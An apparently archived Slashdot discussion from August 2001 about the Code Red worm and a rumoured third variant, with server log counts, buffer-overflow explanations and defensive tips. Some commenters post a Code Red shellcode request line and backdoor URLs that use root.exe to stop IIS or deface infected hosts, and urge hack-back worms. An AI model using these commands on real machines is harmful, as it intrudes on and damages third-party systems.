The key is that Code Red stops learning about your IP once you stop allowing it to find you. Once you block all the *existing* attackers the chances of *new* attackers appearing is lessened quite a bit.

Re:a harsher solution, perhaps?

[WickedLittleSlaveBoy]

moron? maybe, but I'm not using IIS, so where does that put you, AC?

Re:Microsoft should be sued

[Keith+Russell]

I bet it isn't that hard to do "accidentally"

Actually, it is. You are never offered the option during the initial installation (i.e. the moment you boot from the CD). You must wait until the entire installation is finished, then select "Add/Remove Windows Components" from the Add/Remove Programs control panel. From there, IIS can be selected. It is not selected by default.

Re:Buffer overflow vulnerabilities

Dude, I think your missing the point. C++ sucks.

Re:Copycats

Wouldn't it be a nice idea if someone could post a simple script that upon being attack - lynx browser will be activated (or curl or wget) which sends a URL with the string to turn off the IIS?

damn! just today - 400 attacks on my linux... ;(

Re:An ETHICAL way to Anti-Virus

[FatOldGoth]

I'd like to automate this process and generate a "form" email, filling in the relevant details, but I'm not sure how to cause a script to be invoked by a change in the Apache log, except to maybe run a 5 minute cron job that grabs all the Code Red attacks and then renames the log file.

I've done something like that already. It actually picks out any entries in the log from the last hour and mails the originators, rather than tailing the log. Help yourself.

What IP Traffic?

64.83.50.230 - - [10/Aug/2001:12:26:26 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 205

1000 more /. sigs

[EdlinUser]

Over the last 3 years I've collected 1000 /. sigs you can view here:

http://www.ipa.net/~jamesmcinis/sig.html

Re:1000 more /. sigs

[CaNuK]

Is mine good enough to make the cut?

Obviously,IIS is *vastly* more popular then apache

[Jerf]

They quote a columnist for Microsoft's TechNET who makes the false claim that IIS is more popular than apache, and attributes the widespread exploits to that (false) popularity!

More popular with whom? If there's anything these worms have shown us, it's that there's a HELL of a lot more IIS installations then anybody would really have guessed, due to the ease of installing it without even realizing it with Windows 2000.

IIS and Apache may be roughly comparable for "real" websites, but in terms of sheer number of installations, I'd now bet that IIS is creaming apache.

Before you get too huffy, note this is a bad thing, as it has provided a fertile breeding ground for these worms, while providing little-to-no benefit in return.

"More lusers with vulnerable web servers then ever before - Microsoft Windows 2000."

Like a Movie ...

[mlati]

I wonder when Rocky ..uh ..Code Red IV will be released?

More uninformative article ever

[AdamInParadise]

Well, this article is just empty. It just says "There is a Code Red III" and that's it...

Code Red IV

[drift+factor]

It's only a matter of time before CR4 hits, monopolizing off of CR2's success, and filling our web logs with GET /scripts/root.exe hits.

Someone should post the IP addresses.

[Mustang+Matt]

At first I strongly disagreed with writing an anti-virus that would spread the same way disabling the holes, but shoot after the third edition of this virus, I say post the IPs and let everyone have fun with the servers.

Re:Back Door? Somebody call the Goatse.cx guy!

Not quite. Access to the root.exe would be with the "anonymous IIS user" privileges, which are not root-level. How what the trojan EXPLORER.EXE provides is a subject of greater interest...

Re:Oh please, did you see Urban Legend II?

[BitchAss]

Urban Legend II was filmed at my university. Thank you.

An ETHICAL way to Anti-Virus

[Slur]

Hi,

I've been watching my Apache log as I get hit about every 10 minutes by Code Red. For each source IP address I've been doing a reverse lookup and if successful then notifying the webmaster of the source domain about the infected computer on their network.

I'd like to automate this process and generate a "form" email, filling in the relevant details, but I'm not sure how to cause a script to be invoked by a change in the Apache log, except to maybe run a 5 minute cron job that grabs all the Code Red attacks and then renames the log file.

An example of the email I've been sending is this:

Hi,

Just a note to let you know that a copy of the Code Red virus is on your network attacking my web server. The source IP address is: 207.151.xxx.xxx which a reverse lookup shows as xxx.xxx.gdsl.nwc.net . If this is a customer on your network then please pass on to that individual that they need to reboot their NT/W2K server and possibly reinstall their OS. They will also need to get a patch from Microsoft to correct this vulnerability.


This is probably a very miniscule thing to do, but it does - in a way - inoculate against the virus, at least on consumer DSL networks, and in a manner that is both ethical and - like a virus - fairly contagious. I've heard a lot of buzz in places like Slashdot about making an "anti-virus" but why haven't I heard this kind of thing suggested before?

Re:An ETHICAL way to Anti-Virus

When someone asks you for default.ida, just give it to them. Maybe it will shut them up.

cd /var/www/html
dd if=/dev/urandom of=default.ida count=10000

Re:make some money off banner ads

[ekrout]

I refuse to enter a battle of the wits with you --it's against my morals to attack an unarmed person.

Please

[Tebriel]

As a personal favor... PATCH YOUR FSCKING SERVER! Thanks.

Re:Please

[Black+Parrot]

> If Microsoft can't even patch their own servers then how can anyone expect others to do it properly?

The Register is reporting that the worm is now ravaging Micorsoft's internal network, because some foo brought in an infected laptop and plugged it in behind the firewall.

Re:Please

[truthsearch]

If Microsoft can't even patch their own servers then how can anyone expect others to do it properly? The best solution (in the long run), is to switch to a server which has less vulnerabilities.

Re:Please

[tb3]

It's worse than that. Not only did it infect Hotmail servers, but servers on Microsoft's internal network.

Bah.

[austad]

I'm unable to find anymore info on it. Until I see a more comprehensive story, I'm chalking this one up as a gullible journalist (that's redundant) who reports on rumors.

I haven't noticed anything different in my logs, and I probably should have by now as I've been seeing over 20,000 attempts per day. All are still "NNNNNNNNNN....." (of course, this might be the same with CR3).

Re:Bah.

[The_Weevil]

How about an Apache server, PERIOD?

People use MS for no reason, its slow, it costs money, its full of holes. Apache can have FP2000 extensions and ASP (asp at a price i think...). Quite why people use MS is really beyond me. Its nice to see all those dumb .jsp pages on the net disappearing and nice .php ones appearing instead.

Weevil

Re:Bah.

[Airneil]

I've got a page that tracks the hits on my site.

700+ total.

What I want to know is why am I seeing just a fraction of the traffic others are reposting.

(I'm not complaining...)

Re:Bah.

Look for a program called "Hogwash"; it'll filter out all the bad http requests...

Re:Bah.

Then don't install the patch. Just remove ida/idq mappings and redirects, dipshit.

Re:Bah.

Or how about just patching the IIS box?

Re:Bah.

Hope you don't take this the wrong way...

But imagine if you applied that argument to anything else.

For example, lets apply it to speakers. Where I work all the cilent computers (that are configured for sound) have $2 "Yamada" brand sound systems.

Therefore the auditorium should have a "Yamada" brand sound solution, since it's easier to support just one platform, and the techs are used to Yamada "Quality".

Re:Bah.

[Airneil]

So you have about 500 addresses that can get hit.

That would mean you are 500 times as likely to be targetted as my single IP address.

Or am I missing something?

Re:Bah.

[Zaknafein500]

I'm on arrund 500 since the 1st, on a 213.*.0.0 network. Other people have been getting them every second or two (at peak times)

There seems to be a lot of IIS servers running on cable modems. I am on RoadRunner in the 65.0.0.0 class A. My firewall has been getting hits from machines in this same range constantly for the last few days.

Re:Bah.

[mjh]

I've got entire projects sitting dead in the water because one server relies on one piece of third-party software that can't operate with Service Pack 6a, and so can't be brought up until they find a solution.

You might be interested in this article titled, "Securing an unpatchable webserver"

Re:Bah.

[gordzilla]

I think this might be a new release based on CR2. I was being pounded by CR2 last
weekend, but it died off pretty quickly (about 1 or 2 hits a day). Now at 12:00pm EST
today, I started getting pounded again with "XXX". So it's either a second round of CR2 or
it's a new variation.

Re:Bah.

[Syberghost]

No, this fun new version is "XXXXXXXX".

And the only thing I saw wrong in that report is that they believed the companies in question when they reported "isolated" problems that have already been fixed.

I've got entire projects sitting dead in the water because one server relies on one piece of third-party software that can't operate with Service Pack 6a, and so can't be brought up until they find a solution.

The pisser is none of MY servers were affected, but I'm still dead in the water because of a bunch of idiots on other teams and projects.

Re:Bah.

[tijnbraun]

actually php is quite unsafe if not used properly (even in comparison to asp sometimes) A Study In Scarlet. Exploiting Common Vulnerabilities in PHP Applications. And I can assure you that java doens't have these holes ;)

Re:Bah.

I wonder when somebody will code a variant that randomizes that long, obvious string...

Re:Bah.

[Ryokurin]

Fuck you.

The guy said that he didn't see any news sites that had information about it, so I sent put a link up. Why dont you read first and quit trying to be a smartass!

Re:Bah.

[isorox]

I'm on arrund 500 since the 1st, on a 213.*.0.0 network. Other people have been getting them every second or two (at peak times)

Re:Bah.

[Delphis]

Actually, make that 1917 attempts counting all websites across all machines.. that's not a lot compared to other people's findings I guess. Not that I'm complaining either.. There is certainly repetition in the addresses too as well as attempts from the same machine (as someone else pointed out) .. so it just looks like maybe just a fraction of that number of individual machines that found our particular class C.

Re:Bah.

[Ratbert42]

I'm seeing very few hits on my FreeBSD/Apache server, because it's hosted at a colocation facility that's mostly FreeBSD/Apache. The XXXX version tends to scan similar IP addresses, so I haven't seen many of those there.

I've seen quite a few at my company because they are on a business-class cable modem service. They're getting pounded by similar IPs.

My OpenBSD box at home (cable modem) is getting pounded too, but it's mostly ARPs and other broadcast crap related to attacks on neighboring IP addresses. I was getting roughly 1,500 attempts a day when I stopped logging connection attempts to port 80.

Don't know if this will work, but

http://IpOfHackedMachine/scripts/root.exe?/c+net+s top+server

and another thing...

[dermotfitz]

why the hell don't these friggin huge ISP's hire someone who will disallow port 80 access by default? And 21. And 135/9. Are we living in a civilized society? Are they letting the inmates run the asylum? It's pretty frickin obvious that they are the reason for spread of the viruses. And all you @home/RR website runners can bite me. Go pay for your bandwidth and stop using mine. Besides, if you really have something to offer on your site then how about port 81? How'd that be? I'm sure you could rise above these NT/2K spastics who don't know what the hell they are running and just change ports.

Because the patch doesn't block all infections

Because the patch doesn't block all infections

http://www.incidents.org/diary/august2001.php#801 courtesy of incidents.org

Favorite Quote on the subject:

[iforgotmyfirstlogon]

Favorite Quote on the subject:

"I'll be glad when that virus gets out of Beta..."
-G.B.

-Freed

Re:I saw that Reuters story earlier

So why is anyone surprised if large cable/dsl networks start blocking webservers? It's brutal, but at least that'll reach them

All the more reason to write something that permanently takes these machines offline before they screw up all of our capabilities with our ISPs.

Re:More info on Code Red III

[onosendai]

For those who aren't enlightened, over on kuro5hin, there's an interesting piece on the legitamacy of the 'Good Times' virus (yes, i am a karma whore).

When it was first around, alot of it seemed impossible what made it so funny to the more tech aware, and so scary to the rest. Yet these days life is beginning to imitate art, recalibration of the refrigerator -> jini eg ?

Re:Apache infected by Code Red!

[Defiant+One]

Hmmm, even if you do that, you'll still have the junk in your logs, and that huge query string with the XX's or NN's is still going to be a part of the URL request.

I thought of simply redirecting the request to M$ - I mean, it's their freakin' problem, right? - I've had about 50 hits to this default.ida just in the last two days from the main dotcom site which is linked via a single href to a DSL backend, along with neighbors in my DSL range, 64. But, then I've done that kinda thing before and it doesn't change a damn thing, and I still have to look at that junk in my logs. It only changes the log entry from a 404 to a 302, wow.

It's like when someone links to an image you host and won't let go: Even though you redirect it and rename the image, you STILL have to see that 302'ed request in the logs...(There oughta be a law!)[[ and on that note, I've had a two year fight with a certain Geocities/Yahoo webmaster who WILL NOT stop linking to an image, even though it has been a broken link on their site for over a year!! WTF?? ]]

BTW, are you SURE Apache can be infected by Code Red???, 'cause I really don't think that's accurate..

Re:Microsoft should be sued

[szomb]

You have just made an excellent point for a Code Red IV that scrambles the fucking hard drive like a bacon egg n cheese.

People might not care about network bandwidth but they'll care about their data.

Re:Microsoft should be sued

[Mathetes]

Maybe because Microsoft released the patch for the hole over a month ago? Why don't admins just apply the patch!

Re:Copycats

[Zico]

You don't need to install any patch to make your computer immune to Code Red, so what's their excuse?

interesting thing about whitehouse.gov

[Ryu2]

Have you noticed that they are using Akamai now to distribute the content of whitehouse.gov? I guess it's so that they can't be DDOSed in the future with a variant of Code Red (changing the IP address of whitehouse.gov was only a stopgap measure).

What to do about the CodeRed Victim sites

[IBitOBear]

I understand that Code Red provides a root exploit...
If you are getting code-redded by a site, then maybe you should use the root exploit to disable the IIS server or just remove kernel.exe
That is someone shoudl dummy up a default.iap (or whatever) for appachie boxes that will settle the issue once and for all and then post it where it can be got to by us violated linux sites.
No you honor, I shot a *TRESSPASSER*... I didn't go out and hunt down a victim.
NOTE: Add "8-)"s as you feel approprate

And the astroturfers sang a new song.

[Black+Parrot]

Last year the astroturfers' chorus was "Who do you sue when something goes dreadfully wrong?"

Well, something has gone dreadfully wrong. Where are all the lawsuits? Where are all the astroturfers gleefully pointing out that Microsoft's products are better than OSS products, because you can sue Microsoft for your troubles now?

Re:More info?

[westfieldscientific]

The circus got seriously underway here late last Saturday. At that time I made a short list which can be found here.

The cablemodem traffic is annoying but so far no system interference to report here. The attempted attacks just bounce off Apache. Add this to my ever-increasing list of reasons why I'm glad I don't run Windoze.

Anti-worm history

Actually, the first time I heard of the concept of a worm to hunt another worm was in the early 1970s.

There was a rumor of a "catch me if you can" worm lurking around the CyberNET commercial network. It was low threat, as only one copy was circulating itself, and all it did was occasionally teased the system console once as it left a system.

One of the obvious proposals was to make a hunter worm which would kill the original.

Maybe Microsoft originated Code Red?

[jlrowe]

After all, CR will identify NT and Win2k servers, that might possibly be running on pirated software. Now we have logs all over the place of where they are. Do they have licenses??????

Heh.

[Scoria]

Don't bite the hand that feeds you, PCWorld.

squid can protect your http server

[node3667]

Just a single line to say that squid ( http://www.squid-cache.org) can be configured as an acceleration server only (without the proxying), and will automatically deny the default.ida, as well as protect your server from unacceptables requests.

You should be sued

Yes, but when you already know that something sucks before you buy it, it becomes your fault, not theirs. Anyone who was unethical enough to install Microsoft software just in the hopes that they would get to sue Microsoft later over the know defects, deserves to lose.

When you buy Microsoft products, Microsoft isn't fucking you. You are fucking yourself. And you knew you were fucking yourself, but thought someone else would have to suffer the consequences instead of oyu, either because the classic explanation that "Everyone else does it" or because Microsoft has deep pockets. Well, take some accountability for your own actions for a change.

Oh yeah, and if someone that works for you buys a Microsoft product for use at your business, fire that person. Nothing else will save you, except maybe education. (And we've tried about ten years of that, so education can be assumed to be futile.)

Re:Buffer overflow vulnerabilities

[cduffy]

That's mighty odd -- for how long does it use 100% CPU? Do you cause it to loop?

If anything, this is an issue with your Java runtime, not the language or environment spec. Does it happen in GCJ-compiled code?

Subject: Code Red

[VB]

Interesting e-mail someone just sent me:

The server hosting your web site is infected with the "Code Red" Worm. Just thought you might want to notify your sys admin or hosting company. We have received thousands of connection requests from this server and others on the www.xxx.yyy.zzz IP network.

So someone has finally ported Code Red to Apache? >:)

Re:How can you get a BIGGER back door than CRII?

[haral]

I'd like a web interface to control the compromised machine.

Re:M*derators!

all questions about moderation are off topic, as is this message. read the fscking faq, numb-nuts.

Oh please, did you see Urban Legend II?

[boboroshi]

bad movie.

However, The Nightmare on Elm Street and Halloween series were pretty tight.

See, what will happen next is that there will be a code red PREQUEL. Actually, three of them. And their titles will just absolutely suck.

Re:Oh please, did you see Urban Legend II?

[roju]

Wasn't part of Urban Legend 1 filmed at U of Toronto?
That big auditorium was, I seem to recall a tourguide at UT telling me that.

Re:Oh please, did you see Urban Legend II?

That's classified.

My Log..

[Cobain]

My log starts at Aug 1st at 7:30am...

[cobain@dirtyhippie cobain]$ more /etc/httpd/logs/access_log | grep default.ida | wc -l
595

Not that bad, how about you all?

Code Red infection in spite of patch

[shibut]

At work we have a M$ w2k brand new server (installed the last week of July). The server was patched before August 1 and did not have plain vanilla CR. Nevertheless, on Sunday August 6th we still got semi-infected with CRII. I say semi infected since it totally ruined our server's ability to function properly but did not try to infect other machines. When our IT support guy called M$, they claimed we should re-install the patch but went to great lengths to make us re-download the patch from a url they specified (instead of using the patch file we had downloaded at the end of July). This makes me think that maybe they improved the patch since then. Re-installing the patch solved some of the problems and the rest our IT guy had to fix manually.

We've been CR-free for 2 whole days now

For the record: I wanted a Linux server but the guys at work (I'm a gal) didn't want to give up the potential to share calendars (they don't actually use it at the moment but options have value on paper at a VC firm...).

Re:Copycats

Well if they had written it write the first time there'd be no need for duplicates because it would have been decent enough to trash IIS when it was done.

The total opposite of being /.ed

[xZAQx]

W0w, i've never gotten to a slashdot-submitted story so quickly. Other side of the spectrum. Just goes to show you, Taco, nobody gives a shit.
CODE BLUE!

You know...

Why doesn't someone out there write a Code Red worm that infects, installs the patch to disable the back door, then deletes itself?

I think we should switch

I think we should switch to IIS. This way we can have a good vacation from the internet while the code worm runs through the system

Re:Microsoft should be sued

[szomb]

Bwahahahahaha!!!!!

Score 6, HILARIOUS

Re:Put it in another log and forget about it.

For each IP, go to this URI: /scripts/root.exe?+%2fc+echo+%22document.location% 3dgoatse.cx%22+>+..\wwwroot\default.htm'

Waiting for the impact

[The_Weevil]

I'm still logging codered live at http://www.baxpace.com/gateway

I have not picked up this 3rd version yet, but I have picked up a slight code alteration in version 2, which makes codered look for root.exe in C:, not D:. I posted a story on it...

Help me out on this one...

[mystery_bowler]

I understand that Code Red is a worm, but I wish I had more of an understanding of how it really works and what it is really doing. Anyone got a good explanation or link to an explanation?

Re:Help me out on this one...

[Tony-A]

What kind of server buffer handler would execute the content of the buffer? You have to go out of your way doing stupid things to make it happen. Who are these morons at Microsoft who write that kind of code?
Flippant answer. The kind that win benchmarks. Anything that reserves reasonable amounts of memory for variable-length things and cannot or does not insure that nothing spills outside its limits has this kind of problem, and that's most everything, not just Microsoft. Note that the real problem is not the exploits, it is the unnoticed cases where innocent input corrupts logically unrelated data.

Re:Help me out on this one...

A buffer overflow is when something goes past that maximum number of letters, and a program with a buffer overflow problem usually does something strange with the information past that point -- in this case, default.ida takes everthing after that number of letters and runs it like it were a program.

Normally, this would just crash IIS (since it's getting a bunch of garbage, and running garbage makes programs crash) but Code Red is purposely designed so after the right number (200 or whatever) of XXX/NNN's, it tacks on the code to infect the computer with Code Red.

Normally ??
That's only "normal" if you code as if no-one could "accidentally" send you extra data.

Re:Help me out on this one...

[DeadMeat+(TM)]

Code Red takes advantage of what's called a "buffer overflow" in Microsoft's IIS web server software.

What happens is that IIS sits there, waiting for Web browsers to request pages. A Code Red infected server starts randomly picking other computers on the Internet or the network, and requests them to send a Web page called default.ida. It then passes a huge parameter to default.ida.

Apparently, default.ida has hard-coded a maximum length for parameters -- say, 200 letters. (Probably not actually 200 -- but you get the idea.) That's what all the XXX and NNN's are there -- it's the 200 (etc.) letters that's the most default.ida is expecting to receive. A buffer overflow is when something goes past that maximum number of letters, and a program with a buffer overflow problem usually does something strange with the information past that point -- in this case, default.ida takes everthing after that number of letters and runs it like it were a program.

Normally, this would just crash IIS (since it's getting a bunch of garbage, and running garbage makes programs crash) but Code Red is purposely designed so after the right number (200 or whatever) of XXX/NNN's, it tacks on the code to infect the computer with Code Red. So, IIS runs the code, the computer becomes infected with Code Red, it starts trying to spread it to other computers, and the whole cycle starts all over again.

Re:Help me out on this one...

http://www.mdstud.chalmers.se/~md0claes/txt/smashs tack.html

From the article

[slashdot.org]

The Code Red worm spreads surreptitiously through a hole in certain Microsoft software such as Internet Information Server (IIS) Web software and Windows NT or 2000 operating systems

Ah, so Windows NT or 2000 are vulnerable too, uh? God, I love proper journalism.

Apache infected by Code Red!

[c13v3rm0nk3y]

I agree, though I've been racking my brain trying to come up with a creative way to use these incoming requests.

The most net-friendly thing I can come up with is to create a 0-byte /default.ida and just return the 30-byte 200 OK. This still clogs up the logs, but it doesn't add too much general noise, especially if you have custom error messages, like I do.

The most Evil thing I could come up with is using mod_rewrite to send the exact URI and query string back to the originating server:

<IfModule mod_rewrite.c>
# Turn on the rewriting engine RewriteEngine on

# set to 5 for debugging, 0 otherwise
RewriteLogLevel 0
RewriteLog logs/rewrite_log

# If you find a URI that starts "/default.ida", change it to
# http://REMOTE_HOST/ and send the whole URL back wrapped in a
# "303 See Other"
RewriteCond %{REQUEST_URI} ^/default.ida*
RewriteRule ^/(.*)$ http://%{REMOTE_HOST}/?[redirect=seeother,last]

# If you are EVIL, construct a URL of the form
# http://REMOTE_HOST/REQUEST_URI?QUERY_STRING and do the same.
#RewriteRule ^/(.*)$ http://%{REMOTE_HOST}/$1 [redirect=seeother,last]
</IfModule>

Don't feel left out, just because you run Apache! You can be "infected", too. It's fun for the whole family!

The best solution would be an application-level way to just silently block or ignore these requests. It's just not easy to turn off logging on matching a URI. I suppose you could make a virtual host that serves on /default.ida, with logging turned off...?

Moderate the parent UP UP UP

This man is onto something... we need a new version of the worm... one that spreads, and then DoS's www.microsoft.com. Could some enterprising young geek please post the code for something of this nature to /.! Thanks for your time...

Re:Serious blow to open source & free software

[M-G]

Sure, other web servers have potential security holes. But it was Microsoft that decided the index server ISAPI should be installed and accessible by default.

Better Names

[zpengo]

Code Red I, II, and III are pretty dull names. Why not call II and III something like Code Blue or Code Monkey or something.

Re:Better Names

Read on The Onion: 'Dress Code Cracked' :)

--EMH_Mark3

Re:Better Names

[epfreed]

How about "Code Red III: Attack of the Clones?"

What is the CRIII signature?

[yuf]

Still "XXXXXXX", "NNNNNNN", or something new? Is there an easy way to tell this new varient? Or must you get the payload to know? Also, is there any pointer to what the new payload is? I'm not convinced yet.....

Re:What is the CRIII signature?

[Unknown+Bovine+Group]

There is no Code Red III. Some people counted 1.a as 2 hence II is called III.

Serious blow to open source & free software

[Sloppy]

Here we have something that does not come with source code, but people are still able to maintain the program, improve its performance, and then get those improvements quickly out into the field. Even Linux updates don't get distributed this efficiently.

Re:Serious blow to open source & free software

[Phroggy]

They quote a columnist for Microsoft's TechNET who makes the false claim that IIS is more popular than apache, and attributes the widespread exploits to that (false) popularity!

But of course IIS is more popular at Microsoft! Why wouldn't it be? ;-)

Re:Serious blow to open source & free software

[jmv]

Sorry, I didn't understand which program you were talking about... I agree with you now ;-)

Re:Serious blow to open source & free software

[Unknown+Bovine+Group]

Yeah, I know all the press I've seen has said, "Apache, an alternative and better web server, and would have saved all these admins from this huge headache."

and yes that was sarcastic.

Re:Serious blow to open source & free software

[jmv]

Even Linux updates don't get distributed this efficiently.

I don't know how efficient distribution of Linux updates is, but this is certainly not efficient. The different versions of Code Red have been there for more than a month and it doesn't seem to be about to stop. With the amount of publicity there is, you'd expect more people would patch their system. Again, I'm not saying Linux is better on update efficiency, although there seems to be fare less security holes.

Re:Serious blow to open source & free software

[Mike+Schiraldi]

I guess this is the Push Technology thing they made such a fuss about a few years ago.

Re:Serious blow to open source & free software

[ksheff]

They also make it sounds like IIS is the standard and that Apache is just an alternative. I guess they don't read Netcraft's reports. Just MS PR.

Back Door? Somebody call the Goatse.cx guy!

[Bonker]

leaves a wider ?back door'' on infected machines,

Code Red II left a copy of cmd.exe in IIS's 'scripts' directory, giving any and all comers who know the machine's IP address the ability to perform *any* system level command with nothing more than a web browser.

My question here is, how the hell do you have a 'wider' backdoor than that?!

Tech details are sparse. I haven't seen anything yet. Anyone have links to pages about the new variant's payload?

Re:Shutting off IIS on an comprimised box...

nope still something wrong with this. I have had 38 attacks on my machine in the last 4 hours and this is as close as I get when use the code you suggest: CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:

Re:Is this a trick from Hollywood?

[optikSmoke]

I know what you mean.
Jurassic Park III was the best movie i've ever seen, especially since it came from the vast imaginations of Hollywood scriptwriters instead of Micheal Crighton.

Re:Buffer overflow vulnerabilities

[TheMidget]

The buffer overflow we're talking about is not in an OS kernel (Windows), but in an application (the IIS webserver), for chrissakes! And yes, there are webservers coded entirely in Perl. For example, webmin's miniserv. And I'm sure, there are webservers entirely coded in Java too (tomcat?).

The thing is, with Perl and Java, the language's runtime handles memory allocation/de-allocation. And barring a bug in the language itself, there's no way an app written in such language can overflow a buffer. Either the buffer will be grown dynamically to fit the data, or the app will get an exception. But corruption of unrelated data cannot happen in this way.

Thank God

Finally a Code Red article on Slashdot that doesn't mention Sircam!

Gives me an idea to stop it spreading so fast...

[chainsaw1]

I wonder if you can slow down the worm by stalling the worm's thread process. If you added a default.ida file that, essentially, took forever to return data/download (or at least caused a timeout while waiting to load a file), would the worm slow down?

Pros: We know the worm only creates 99 threads at a time. This could theoretically stop it spreading

Cons: Bandwith limit (stalled download) needs to be used to avoid DDOS-ing yourself.

Need to kill the connection to keep from memory busting the TCP stack or occupying all available TCP ports.

You'd basically be playing TCP firewall games based on a request on httpd for hitting a specific file in the website file tree. Scripting that may be difficult or impossible.

Anyone have any other thoughts?

Re:Linux to the rescue?

[Syberghost]

The bottom line regarding legality isn't what clever logical constructs we can formulate on /.

The bottom line is what 12 people too stupid to get out of jury duty are going to think, and the average person would think that making use of a hole in order to run code on somebody else's machine without their permission is an intrusion, and thus illegal.

Your life isn't in danger from the attack on your system, so you have a "duty to retreat" that compels you to shut down your system if necessary, not counterattack.

I don't agree with it, but there won't be 12 of me on your jury.

Re:make some money off banner ads

your website sucks.
-c

I saw that Reuters story earlier

[GC]

but I have not seen any instances of attempted infection.

It's all very vague and the chances of mistaking Code Red rev C as Code Red III, (rev C = version II) are simply too high.

I also assume that this takes advantage of the same Index Vulnerability in IIS, which if anyone has been hit by either of the first two versions then they will have minimised the risks of a new version which uses the same vulnerability.

Re:I saw that Reuters story earlier

[the_2nd_coming]

yeah but the back door is still there from CR2 so, if tthat is not fixed, CR3 could use that, of cource this will eventualy go out of existence as more nad more servers are reinstalled and patched there will be fewer and fewer systems that are vulnrable, however, ISPs will have to crack down on those stupid W2K home users.

make some money off banner ads

[SethJohnson]

Taco, I recommend you sign up with one of those online casino sites and host banner ads on your server with the file name of /default.ida. You should be able to rack up a few thousand unique page views a day by pointing the scourge at the scourge (ala Fist Full of Dollars).

Re:make some money off banner ads

[ekrout]

I see from your other posts that you've taken to filling the grammar-Nazi role.

No, I just enjoy correcting morons like Taco and yourself.

That's sad.

I guess.

That's just fuckin' sad (by the way: I would gauge that you are both a pillowbiter and a cockbiter).

Is anything not "sad" to you? Just curious...

cockbiter ... pillowbiter ... dildo

I see someone has a I-Hate-The-World's-Living-Things-Because-I'm-Barel y-Smart-Enough-To-Point-And-Click-My-Way-To-MSCE-C ertification complex. Interesting.

Re:make some money off banner ads

No, I just enjoy correcting morons like Taco and yourself.

The funny thing is that once you enter the real world you'll have a cold slap of reality on the face: Suddenly being the "smart one" in a small group of people doesn't quite count when you're working at a company where the software development team was selected among a potential population base of 100s of thousands, and every one of them has a "high IQ". You're not special, moron, and I would estimate that you're less-than-average in the advanced level of computer sciences. I can gauge exactly what you're like right now because I've seen a million like you: Moron school-boy interns/co-ops who have absolutely marginal programming skills, but they're sure that they're the shit: Hey, in a class full of didn't-want-to-be-there classmates (often drunk) they came out on the upper end of the bell curve: Shit they must be awesome! Of course they blow out pretty quickly and soon are back to pursue another field that isn't quite so competitive.

However, moron, you keep incorrectly "correcting" people, however appaling it is. You sure must be smart!

Re:make some money off banner ads

I'm a no account anonymous coward - rudy@winface.com.... I love your idea re banner ads. And it's easy to implement as a help to your friends -- just use Apache redirect command. For example mu httpd.conf now includes (in the directive for htdocs) Redirect /default.ida http://www.msn.com/ but you could just as easily redirect to a doubleclick counter... or

Re:make some money off banner ads

Oooh isn't a word.

Re:make some money off banner ads

When you do banners for a casino, you're spinning the wheel. You might get paid for it, you might not :)

Typical eh?

Copycats

[Wind_Walker]

This is getting a bit ridiculous. First it was Code Red, which was actually a pretty nice piece of code. Then Code Red II, which was a hack job by somebody who barely knew how to use a text editor. Now we have Code Red III? I'm willing to bet that it's an even worse job than II!

This is the same damn thing that happened to the I Love You worm that spread around. About a week after it was calmed down, some 1337 5kr1p7 K1dd13 got a hold of it and changed 2 lines, re-releasing it. Stupid copycating, that's all it is.

I'm willing to bet that whoever edited the virus this time is reading slashdot right now and is getting a boner off the fact somebody submitted it (if he didn't submit it himself).

Get over it. Code Red is dead. And all the editing and all the 1337 references in the world are not going to help it; Just let it die.

Re:Copycats

[billh]

How in the hell did this get moderated up? This thing is active, and will remain active, until EVERY IIS server has been patched. Whether or not the patch even works correctly remains to be seen.

We'll be seeing this thing for months.

From one of my servers:

Report generated on August 10, 2001 at 03:08
59 Code Red
525 Code Red II
584 Total attacks.

Report generated on August 09, 2001 at 03:08
76 Code Red
613 Code Red II
689 Total attacks.

Report generated on August 08, 2001 at 03:08
107 Code Red
578 Code Red II
685 Total attacks.

Report generated on August 07, 2001 at 03:08
124 Code Red
419 Code Red II
543 Total attacks.

Re:Copycats

[r1ddl3]

Check you server logs and then tell me it's dead

Re:Copycats

[Nater]

The folks here at the Fortune 500 company I work for who have been working around the clock since Wednesday trying to clean up this mess will be real happy to hear that you don't believe it exists.

Folks at your Fortune 500 company will also be real happy to hear that they can get, for free in many cases, a webserver and operating system that are significantly less susceptible to this sort of thing, especially since updated packages which fix this type of hole can be installed near-automatically generally within a day of discovering the vulnerability, and support for this platform is available from any one (or several, if they like) of thousands of people and companies around the world. They don't even have to buy new hardware, it will run on their existing systems.

Would you mind suggesting it to them?

Re:Copycats

[Syberghost]

Would you mind suggesting it to them?

Yeah, us folks on the Unix side of the operation have been snickering at the NT guys the whole time.

Unfortunately, some of our stuff requires some of theirs to be there in order to push the data around.

Re:Copycats

[DoXaVG]

And why the hell weren't they working on it when the advisory first came out in June? They aren't doing their job if it takes an infection of this scale to make them patch this hole. And let's face it, if it took them one and a half months to get around to patching this one hole, how many others have they left unpatched? See ya around when the next worm hits. I don't have one bit of sympathy for these people, the bottom line is they weren't doing their job.

Re:Copycats

[Syberghost]

And why the hell weren't they working on it when the advisory first came out in June? They aren't doing their job if it takes an infection of this scale to make them patch this hole. And let's face it, if it took them one and a half months to get around to patching this one hole, how many others have they left unpatched? See ya around when the next worm hits. I don't have one bit of sympathy for these people, the bottom line is they weren't doing their job.


I completely agree. And yet, despite the fact that I was doing my job, this still left me dead in the water.

And some of them were working on it when they got the advisory, but couldn't fix it yet because their third-party software doesn't work with Service Pack 6 installed, so they can't install the patch. They were working with the vendors to get the software updated, or working to find or code a replacement, trusting that the NT admins with customer-facing IIS servers would patch.

Some of those folks were overridden by PHBs.

While this was going on, I was being told I couldn't install a Sun FTP patch "until it was tested via the normal process", which added about a week of time in which I was subject to a known vulnerability, but couldn't do dick about it.

Ironically, we installed it Thursday.

